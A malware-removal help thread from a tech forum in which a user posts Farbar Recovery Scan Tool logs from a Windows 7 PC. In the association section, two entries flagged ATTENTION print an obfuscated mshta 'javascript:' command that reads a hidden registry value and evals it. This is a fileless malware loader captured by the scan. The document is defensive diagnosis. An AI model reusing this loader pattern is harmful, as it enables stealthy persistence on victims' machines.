IE/ Foxfire question

Have you had a chance to look at this ? no hurry just wondering ..
thanks,
hefs

I suppose your helper is out of town or something. sorry for the delay… Let’s get some FRST logs, and @gus will be assisting you.

Please run Farbar Recovery Scan Tool to give me a fresh look at your system.

Please download the FRST 32 bit or FRST 64bit version to suit your operating system. It is important FRST is downloaded to your desktop.

If you are unsure if your operating system is 32 or 64 Bit please go HERE.

[ul]
[li]Right-click on FRST icon and select Run as Administrator to start the tool.[/li](XP users click run after receipt of Windows Security Warning - Open File).
[li]Make sure that Addition option is checked, as well as Shortcut.txt[/li][li]Press Scan button and wait.[/li][li]The tool will produce three logfiles on your desktop: FRST.txt, and Addition.txt – & Shortcut.txt[/li][/ul]
Please Copy & Paste them into your next reply. But attach Shortcut.txt

Sorry..never saw a place that said run as Adm.. I know it is a 32 bit and clicked that..box came uo asking to run or save…hit run and here is what I got…they ended up in note pad..have no idea where that is..so can’t see how to send them to you..it must not be right because there were only two of them..
You know by now you are dealing with a computer idiot
Also got something from Gus I broke a rule..not sure what I did but apologise…

Thanks, hefs

Hello Hefs,
As per the instructions above, you should have downloaded FRST to the desktop and run it (as administrator) from there. It would have then produced 3 files on the desktop
[ol]
[li]FRST.txt[/li][li]Addition.txt[/li][li]Shortcut.txt[/li][/ol]
Once you have these files please copy and paste the contents of FRST.txt and Addition.txt in your next post. Also attach Shortcut.txt
It’s all good, your second newly created member account has been removed because you are only allowed to have one account, and making another thread about the same topic is not helpful, but rest assured we will help you get your issues sorted out(y)

If you are unsure about any of the above instructions please give me a shout.

You can attach them to the tread the same as you did the other logs.

[HEADING=1]Additional scan result of Farbar Recovery Scan Tool (x86) Version: 15-03-2017
Ran by hilton (13-04-2017 12:35:25)
Running from C:\Users\hilton\Downloads
Microsoft Windows 7 Professional Service Pack 1 (X86) (2016-06-29 20:30:51)
Boot Mode: Normal[/HEADING]
==================== Accounts: =============================

Administrator (S-1-5-21-3292114827-816517840-1514174382-500 - Administrator - Disabled)
Guest (S-1-5-21-3292114827-816517840-1514174382-501 - Limited - Disabled)
hilton (S-1-5-21-3292114827-816517840-1514174382-1000 - Administrator - Enabled) => C:\Users\hilton
HomeGroupUser$ (S-1-5-21-3292114827-816517840-1514174382-1002 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
FW: Avast Antivirus (Enabled) {B693136B-F6EE-DD1C-A0EF-229B8B0B29C4}

==================== Installed Programs ======================

(Only the adware programs with “Hidden” flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC (HKLM...{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 ActiveX (HKLM...\Adobe Flash Player ActiveX) (Version: 25.0.0.148 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Amazon Amazon Music) (Version: 5.3.5.1704 - Amazon Services LLC)
Avast Internet Security (HKLM...\Avast Antivirus) (Version: 17.3.2291 - AVAST Software)
Canon MG3200 series MP Drivers (HKLM...{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG3200_series) (Version: - Canon Inc.)
Canon Quick Menu (HKLM...\CanonQuickMenu) (Version: 2.7.1 - Canon Inc.)
CCleaner (HKLM...\CCleaner) (Version: 5.28 - Piriform)
Dell System Detect (HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\58d94f3ce2c27db0) (Version: 7.11.0.6 - Dell)
DriverUpdate (HKLM...\DriverUpdate) (Version: 4.0.0 - Slimware Utilities Holdings, Inc.)
DriverUpdate (Version: 4.0.0 - Slimware Utilities Holdings, Inc.) Hidden
eM Client (HKLM...{2A4CAF55-4B18-4B61-BE9E-94A54209F547}) (Version: 7.0.27943.0 - eM Client Inc.)
FromDocToPDF Internet Explorer Homepage and New Tab (HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\FromDocToPDFTooltab Uninstall Internet Explorer) (Version: - Mindspark Interactive Network, Inc.) <==== ATTENTION
Google Chrome (HKLM...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Update Helper (Version: 1.3.33.3 - Google Inc.) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM...\HDMI) (Version: 8.15.10.1930 - Intel Corporation)
Intel(R) Management Engine Interface (HKLM...\HECI) (Version: - Intel Corporation)
Intel(R) Network Connections 19.5.303.0 (HKLM...\PROSetDX) (Version: 19.5.303.0 - Intel)
Intel(R) Wireless Bluetooth(R)(patch version 19.0.1629.3590) (HKLM...{302600C1-6BDF-4FD1-1603-148929CC1385}) (Version: 19.0.1603.0650 - Intel Corporation)
Intel® Active Management Technology (HKLM...\MESOL) (Version: - Intel Corporation)
Kodi (HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Kodi) (Version: - XBMC-Foundation)
Microsoft .NET Framework 4.6.1 (HKLM...{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Silverlight (HKLM...{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM...{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM...{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM...{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM...{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Mozilla Firefox 52.0 (x86 en-US) (HKLM...\Mozilla Firefox 52.0 (x86 en-US)) (Version: 52.0 - Mozilla)
Mozilla Maintenance Service (HKLM...\MozillaMaintenanceService) (Version: 52.0.0.6270 - Mozilla)
OpenOffice 4.1.3 (HKLM...{EEA30AEB-8BA7-465B-85D4-098BB99733E7}) (Version: 4.13.9783 - Apache Software Foundation)
RoboForm 8-3-1-1 (All Users) (HKLM...\AI RoboForm) (Version: 8-3-1-1 - Siber Systems)
SafeZone Stable 3.55.2393.590 (Version: 3.55.2393.590 - Avast Software) Hidden
SafeZone Stable 3.55.2393.596 (Version: 3.55.2393.596 - Avast Software) Hidden
Samsung USB Driver for Mobile Phones (HKLM...{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
SoundMAX (HKLM...{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.1.7280 - Analog Devices)
Stardock Fences 3 (HKLM...\Stardock Fences 3) (Version: 3.03 - Stardock Software, Inc.)
Stardock ObjectDock (HKLM...\Stardock ObjectDock) (Version: 2.20 - Stardock Software, Inc.)
WIDCOMM Bluetooth Software (HKLM...{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.2700 - Broadcom Corporation)
Windows Mobile Device Center (HKLM...{904CCF62-818D-4675-BC76-D37EB399F917}) (Version: 6.1.6965.0 - Microsoft Corporation)
Windows Mobile Device Center Driver Update (HKLM...{E7044E25-3038-4A76-9064-344AC038043E}) (Version: 6.1.6965.0 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0FEEAAD8-76C7-4B2C-8F73-A21BB9D814D3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-12-25] (Google Inc.)
Task: {224A052F-EE78-4A67-B44E-75C5338C2C0A} - System32\Tasks\SafeZone scheduled Autoupdate 1482114147 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-03-22] (Avast Software)
Task: {2E1F1D2B-A7F0-47BE-9978-16429AE3489C} - System32\Tasks\Driver Support-RTMScan => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
Task: {2E451AE4-8D27-484B-B16F-D509AF77F27D} - System32\Tasks\Driver Support => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
Task: {599B1B91-94BB-47B7-B9DB-8C9A5FAB8A12} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-04-12] (AVAST Software)
Task: {6782147C-F074-4313-B1B6-20D506A59457} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {69879873-87A5-4A6E-947D-918B26EA1025} - System32\Tasks\Driver Support-RTMUpdater => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
Task: {7165A1B7-F1E6-4C37-BB48-9ABE90C6D3E3} - System32\Tasks\DriverUpdate Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe [2016-08-01] (SlimWare Utilities, Inc.)
Task: {9B71B164-D984-4853-BA08-95A906000F12} - System32\Tasks\Open URL by RoboForm => Rundll32.exe url.dll,FileProtocolHandler "hxxps://www.roboform.com/test-pass.html?aaa=KICMKMKMNJHMOMGMNMJJCNPMNJMJMJCNLMJM HMKMCNOJOMOJLJCNPMJJNMHMOMOJMMJJMJHMJMOJJNJICMHMCN MMCNOMFMOMOMCNPMCNGMJMPMPMFMJMCNOMCNIMJMPMOMCNNMJN PICMPMFMEKMICNJJCKFMNMHMJMJNHICMOMPMKJCJMIJNBJCMHJ GJDJLIAJBJJNKJCMJNNICMJNDJCMKJBJJNMJCMPMF (the data entry has 42 more characters).
Task: {A432DC7B-B85A-4B9D-970A-1E7753295BF1} - System32\Tasks\Run RoboForm TaskBar Icon => C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe [2017-04-12] (Siber Systems)
Task: {ACA2CFD2-877B-4148-BCDB-579CDEBD6855} - System32\Tasks\Games\UpdateCheck_S-1-5-21-3292114827-816517840-1514174382-1000
Task: {AEBAC022-C4BF-468A-A3B0-A99EF616D1AA} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-12-25] (Google Inc.)
Task: {B65BA30C-B2B6-46F4-B376-2009DA700634} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-03-03] (Piriform Ltd)
Task: {BF5F61F7-5B68-424F-BC5D-73C6030B203E} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-27] (AVAST Software)
Task: {C24F7343-825C-44A5-A240-4432598C8B17} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpda teService.exe [2017-04-12] (Adobe Systems Incorporated)
Task: {E572A5EE-C9B3-477C-B58F-EE074238EB6E} - System32\Tasks\DriverUpdate Startup.job => C:\Program Files\DriverUpdate\DriverUpdate.exe [2016-08-01] (SlimWare Utilities, Inc.)
Task: {E753F27A-B7AA-4831-A49E-9186D40D7565} - System32\Tasks\Driver Support-RTMRules => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DriverUpdate Scan.job => C:\Program Files\DriverUpdate\DriverUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2017-04-12 14:40 - 2017-04-12 14:40 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00176480 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00653520 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00230632 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll
2017-04-13 07:45 - 2017-04-13 07:45 - 06015544 _____ () C:\Program Files\AVAST Software\Avast\defs\17041300\algo.dll
2017-04-12 14:39 - 2017-04-12 14:39 - 00134920 _____ () c:\Program Files\AVAST Software\Avast\vaarclient.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00230632 _____ () c:\Program Files\AVAST Software\Avast\StreamBack.dll
2016-07-28 13:02 - 2016-07-28 13:02 - 00093528 _____ () C:\Program Files\DriverUpdate\CrashRpt.dll
2016-12-18 22:20 - 2016-12-18 22:20 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2017-04-12 14:39 - 2017-04-12 14:39 - 00293936 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
2016-08-01 10:37 - 2016-08-01 10:37 - 00076120 _____ () C:\Program Files\SlimWare Utilities\Services\CrashRpt.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon-321416266 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon-36986836 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon1520975912 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon62545966 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon825986531 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_Goldbox16.CB200960310-1866390539 [2814]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICO N_0favicon-919252660 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICO N_1favicon871367106 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICO N_2favicon717581649 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICO N_3favicon364977008 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICO N_4favicon-1245215657 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_0sm_ weather-1654153164 [2302]
AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_1sm_ news888331756 [2302]
AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_2sm_ maps-889989894 [2302]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The “AlternateShell” value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Min imal\MCODS => “”=“”
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Net work\mcapexe => “”=“”
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Net work\McNaiAnn => “”=“”
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Net work\mfeplk => “”=“Service”
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Net work\mfeplk.sys => “”=“Driver”

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Software\Classes\49c4f: “C:\Windows\system32\mshta.exe” “javascript:WJc2I4C=“TtZ”;I7o0=new ActiveXObject(“WScript.Shell”);ivp77AS=“IJm09”;n30 PTY=I7o0.RegRead(“HKCU\software\jtosjykc\khzqgpmhk ”);Wdq2Upz=“eTw”;eval(n30PTY);zfuWFiF0=“36B”;” <===== ATTENTION
HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Software\Classes\89873: “C:\Windows\system32\mshta.exe” “javascript:A2FZidrE=“CPVI”;S19T=new ActiveXObject(“WScript.Shell”);phe0u=“W1NGquh”;OsT 4c0=S19T.RegRead(“HKCU\software\ovbrx\adbychucad”) ;bE4RCT=“yLuy”;eval(OsT4c0);siDwFRU9=“iAbe”;” <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\dell.com → dell.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:04 - 2016-07-17 14:58 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Control Panel\Desktop\Wallpaper → C:\Users\hilton\AppData\Roaming\Microsoft\Windows\ Themes\TranscodedWallpaper.jpg
DNS Servers: 209.18.47.61 - 209.18.47.62
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{0DC8D093-6A4A-46DF-81F7-51A31BA38190}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSv cHost.exe
FirewallRules: [TCP Query User{AC689693-B971-449C-8EA9-AC51E5D70F9C}C:\users\hilton\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\hilton\appdata\local\amazon music\amazon music helper.exe
FirewallRules: [UDP Query User{25F20FE1-CB5D-4B09-9160-3C9094A6B8A8}C:\users\hilton\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\hilton\appdata\local\amazon music\amazon music helper.exe
FirewallRules: [{EAD2EC74-0D35-4D3D-900E-D48B9AB5AE26}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{E8207517-F4F1-4084-AD6C-988A4CDC999F}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{8F434A18-CE8D-45DC-AD17-44370BA521AC}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.561\SZBrowser.exe
FirewallRules: [{0941F852-CFCF-4D18-A6F8-20FE7A5ACEC5}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596_0\SZBrowser.exe
FirewallRules: [{30AFA8FF-C296-4B9A-AD9E-55C4A601D1BB}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

05-04-2017 00:00:04 Scheduled Checkpoint
12-04-2017 03:00:16 Windows Update
12-04-2017 14:06:47 Restore Operation
12-04-2017 15:19:46 Windows Update

==================== Faulty Device Manager Devices =============

Name: avast! SecureLine TAP Adapter v3
Description: avast! SecureLine TAP Adapter v3
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TAP-Windows Provider V9
Service: aswTap
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click “Action”, and then click “Enable Device”. This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================
[HEADING=1]Application errors:[/HEADING]
Error: (04/13/2017 12:33:33 PM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver

Error: (04/13/2017 11:10:02 AM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver

Error: (04/13/2017 11:08:16 AM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver

Error: (04/12/2017 04:06:07 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for “C:\Program Files\DriverUpdate\MFC80U.DLL”.
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture=“x86”, publicKeyToken=“1fc8b3b9a1e18e3b”,type=“win32”,ver sion=“8.0.50608.0” could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (04/12/2017 04:05:49 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for “C:\Program Files\DriverUpdate\MFC80U.DLL”.
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture=“x86”, publicKeyToken=“1fc8b3b9a1e18e3b”,type=“win32”,ver sion=“8.0.50608.0” could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (04/12/2017 04:03:30 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query “SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA “Win32_Processor” AND TargetInstance.LoadPercentage > 99” could not be reactivated in namespace “//./root/CIMV2” because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/12/2017 03:19:46 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine ConvertStringSidToSid(S-1-5-21-3292114827-816517840-1514174382-1000.bak). hr = 0x80070539, The security ID structure is invalid.
.

Operation:
OnIdentify event
Gathering Writer Data

Context:
Execution Context: Shadow Copy Optimization Writer
Writer Class Id: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
Writer Name: Shadow Copy Optimization Writer
Writer Instance ID: {460ea05d-9812-4601-ba62-5d80b9e346fa}

Error: (04/12/2017 03:19:44 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1533) (User: NT AUTHORITY)
Description: Windows cannot delete the profile directory C:\Users\TEMP. This error may be caused by files in this directory being used by another program.

DETAIL - The directory is not empty.

Error: (04/12/2017 03:18:15 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for “C:\Program Files\DriverUpdate\MFC80U.DLL”.
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture=“x86”, publicKeyToken=“1fc8b3b9a1e18e3b”,type=“win32”,ver sion=“8.0.50608.0” could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (04/12/2017 03:18:09 PM) (Source: ESENT) (EventID: 215) (User: )
Description: WinMail (3740) WindowsMail0: The backup has been stopped because it was halted by the client or the connection with the client failed.
[HEADING=1]System errors:[/HEADING]
Error: (04/13/2017 10:34:20 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (04/13/2017 10:34:13 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (04/12/2017 03:18:25 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The HomeGroup Listener service terminated with service-specific error %%-2147023143 = There are no more endpoints available from the endpoint mapper..

Error: (04/12/2017 03:07:57 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.

Error: (04/12/2017 03:07:54 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.

Error: (04/12/2017 03:07:34 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.

Error: (04/12/2017 03:07:31 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.

Error: (04/12/2017 03:07:05 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.

Error: (04/12/2017 03:07:03 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.

Error: (04/12/2017 03:02:45 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.

==================== Memory info ===========================

Processor: Intel(R) Core™2 CPU 6300 @ 1.86GHz
Percentage of memory in use: 44%
Total physical RAM: 3316.61 MB
Available physical RAM: 1847.67 MB
Total Virtual: 6631.55 MB
Available Virtual: 5076.47 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:1859.99 GB) (Free:1818.73 GB) NTFS

==================== MBR & Partition Table ==================

================================================== ======
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: F9D26468)
Partition 1: (Active) - (Size=3 GB) - (Type=27)
Partition 2: (Not Active) - (Size=1860 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
hope this works…
thanks
hefs

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 15-03-2017
Ran by hilton (administrator) on HILTON-PC (13-04-2017 12:34:55)
Running from C:\Users\hilton\Downloads
Loaded Profiles: hilton (Available Profiles: hilton)
Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\afwServ.exe
(Intel Corporation) C:\Program Files\Intel\AMT\atchksrv.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Intel Corporation) C:\Program Files\Intel\Bluetooth\ibtsiva.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel) C:\Program Files\Intel\AMT\LMS.exe
(Intel) C:\Program Files\Intel\AMT\UNS.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\aswidsagent.exe
(SlimWare Utilities, Inc.) C:\Program Files\DriverUpdate\DriverUpdate.exe
(Intel Corporation) C:\Program Files\Intel\AMT\atchk.exe
(Analog Devices, Inc.) C:\Program Files\Analog Devices\Core\smax4pnp.exe
(CANON INC.) C:\Program Files\Canon\Quick Menu\CNQMMAIN.EXE
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Amazon Services LLC) C:\Users\hilton\AppData\Local\Amazon Music\Amazon Music Helper.exe
(Dell) C:\Users\hilton\AppData\Local\Apps\2.0\3VGPG9W0.MP E\2E0VXQW4.WA5\dell..tion_6d0a76327dca4869_0007.00 0b_df227eeaae3cac0d\DellSystemDetect.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Motorola Solutions, Inc.) C:\Program Files\Intel\Bluetooth\devmonsrv.exe
(Motorola Solutions, Inc.) C:\Program Files\Intel\Bluetooth\obexsrv.exe
(Motorola Solutions, Inc.) C:\Program Files\Intel\Bluetooth\mediasrv.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(CANON INC.) C:\Program Files\Canon\Quick Menu\CNQMUPDT.EXE
(Google Inc.) C:\Program Files\Google\Update\1.3.33.3\GoogleCrashHandler.ex e
(SlimWare Utilities Holdings, Inc.) C:\Program Files\SlimWare Utilities\Services\SlimWare.Services.exe
(SlimWare Utilities Holdings, Inc.) C:\Program Files\SlimWare Utilities\Services\SlimWare.Session.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Siber Systems) C:\Program Files\Siber Systems\AI RoboForm\robotaskbaricon.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil32_25_ 0_0_148_ActiveX.exe
(Farbar) C:\Users\hilton\Downloads\FRST (2).exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM...\Run: [atchk] => C:\Program Files\Intel\AMT\atchk.exe [401408 2009-12-01] (Intel Corporation)
HKLM...\Run: [SoundMAXPnP] => C:\Program Files\Analog Devices\Core\smax4pnp.exe [1314816 2010-06-15] (Analog Devices, Inc.)
HKLM...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-04-12] (AVAST Software)
HKLM...\Run: [Fences] => C:\Program Files\Stardock\Fences\Fences.exe [3934168 2016-09-16] (Stardock Corporation)
HKLM...\Run: [CanonQuickMenu] => C:\Program Files\Canon\Quick Menu\CNQMMAIN.EXE [1314432 2016-06-09] (CANON INC.)
HKLM...\Run: [Windows Mobile Device Center] => C:\Windows\WindowsMobile\wmdc.exe [648072 2007-05-31] (Microsoft Corporation)
HKLM...\Run: [BTMTrayAgent] => rundll32.exe “C:\Program Files\Intel\Bluetooth\btmshellex.dll”,TrayApp
HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [7348440 2017-03-03] (Piriform Ltd)
